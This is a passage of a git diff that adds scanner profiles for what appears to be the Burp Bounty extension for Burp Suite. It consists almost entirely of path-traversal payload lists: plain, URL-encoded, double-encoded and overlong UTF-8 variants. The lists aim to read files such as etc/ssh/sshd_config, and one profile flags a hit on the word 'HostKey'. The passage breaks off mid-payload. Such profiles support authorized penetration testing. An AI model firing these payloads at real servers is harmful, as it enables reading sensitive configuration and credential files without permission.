+ "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}",
+ "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}",
+ "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\{FILE}",
+ "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\{FILE}",
+ "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\{FILE}",
+ "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\{FILE}",
+ "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\{FILE}",
+ "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,./../{FILE}",
+ "true,./.././../{FILE}",
+ "true,./.././.././../{FILE}",
+ "true,./.././.././.././../{FILE}",
+ "true,./.././.././.././.././../{FILE}",
+ "true,./.././.././.././.././.././../{FILE}",
+ "true,./.././.././.././.././.././.././../{FILE}",
+ "true,./.././.././.././.././.././.././.././../{FILE}",
+ "true,.\\..\\{FILE}",
+ "true,.\\..\\.\\..\\{FILE}",
+ "true,.\\..\\.\\..\\.\\..\\{FILE}",
+ "true,.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
+ "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
+ "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
+ "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
+ "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
+ "true,.//..//{FILE}",
+ "true,.//..//.//..//{FILE}",
+ "true,.//..//.//..//.//..//{FILE}",
+ "true,.//..//.//..//.//..//.//..//{FILE}",
+ "true,.//..//.//..//.//..//.//..//.//..//{FILE}",
+ "true,.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",
+ "true,.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",
+ "true,.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",
+ "true,.\\\\..\\\\{FILE}",
+ "true,.\\\\..\\\\.\\\\..\\\\{FILE}",
+ "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
+ "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
+ "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
+ "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
+ "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
+ "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
+ "true,../{FILE}",
+ "true,../..//{FILE}",
+ "true,../..//../{FILE}",
+ "true,../..//../..//{FILE}",
+ "true,../..//../..//../{FILE}",
+ "true,../..//../..//../..//{FILE}",
+ "true,../..//../..//../..//../{FILE}",
+ "true,../..//../..//../..//../..//{FILE}",
+ "true,..\\{FILE}",
+ "true,..\\..\\\\{FILE}",
+ "true,..\\..\\\\..\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\..\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\..\\..\\\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\{FILE}",
+ "true,..///{FILE}",
+ "true,../..///{FILE}",
+ "true,../..//..///{FILE}",
+ "true,../..//../..///{FILE}",
+ "true,../..//../..//..///{FILE}",
+ "true,../..//../..//../..///{FILE}",
+ "true,../..//../..//../..//..///{FILE}",
+ "true,../..//../..//../..//../..///{FILE}",
+ "true,..\\\\\\{FILE}",
+ "true,..\\..\\\\\\{FILE}",
+ "true,..\\..\\\\..\\\\\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\..\\\\\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\\\\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}"
+ ],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,HostKey"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 1,
+ "Scope": 0,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 1,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "Linux-sshd-conf",
+ "IssueSeverity": "Medium",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "Linux-sshd-conf",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [
+ {
+ "type": "Payload",
+ "match": "{FILE}",
+ "replace": "etc/ssh/sshd_config",
+ "regex": "String"
+ }
+ ],
+ "VariationAttributes": [],
+ "InsertionPointType": [
+ 18,
+ 65,
+ 32,
+ 36,
+ 7,
+ 1,
+ 2,
+ 6,
+ 33,
+ 5,
+ 35,
+ 34,
+ 64,
+ 0,
+ 3,
+ 4,
+ 37,
+ 127,
+ 65,
+ 32,
+ 36,
+ 7,
+ 1,
+ 2,
+ 6,
+ 33,
+ 5,
+ 35,
+ 34,
+ 64,
+ 0,
+ 3,
+ 4,
+ 37,
+ 127
+ ],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/Linux-vsftpd-conf.bb b/profiles/Linux-vsftpd-conf.bb
index 40b5806..9aaa0a1 100755
--- a/profiles/Linux-vsftpd-conf.bb
+++ b/profiles/Linux-vsftpd-conf.bb
@@ -1 +1,950 @@
-[{"Name":"Linux-vsftpd-conf","Enabled":true,"Scanner":1,"Author":"@Sy3Omda","Payloads":["../{FILE}","../../{FILE}","../../../{FILE}","../../../../{FILE}","../../../../../{FILE}","../../../../../../{FILE}","../../../../../../../{FILE}","../../../../../../../../{FILE}","..%2f{FILE}","..%2f..%2f{FILE}","..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","%2e%2e/{FILE}","%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","..%252f{FILE}","..%252f..%252f{FILE}","..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","%252e%252e/{FILE}","%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","..\\{FILE}","..\\..\\{FILE}","..\\..\\..\\{FILE}","..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\..\\..\\{FILE}","..%255c{FILE}","..%255c..%255c{FILE}","..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","..%5c..%5c{FILE}","..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","..%c0%af{FILE}","..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}","%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","..%c1%9c{FILE}","..%c1%9c..%c1%9c{FILE}","..%c1%9c..%c1%9c..%c1%9c{FILE}","..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}","..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}","..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}","..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}","..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}","%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE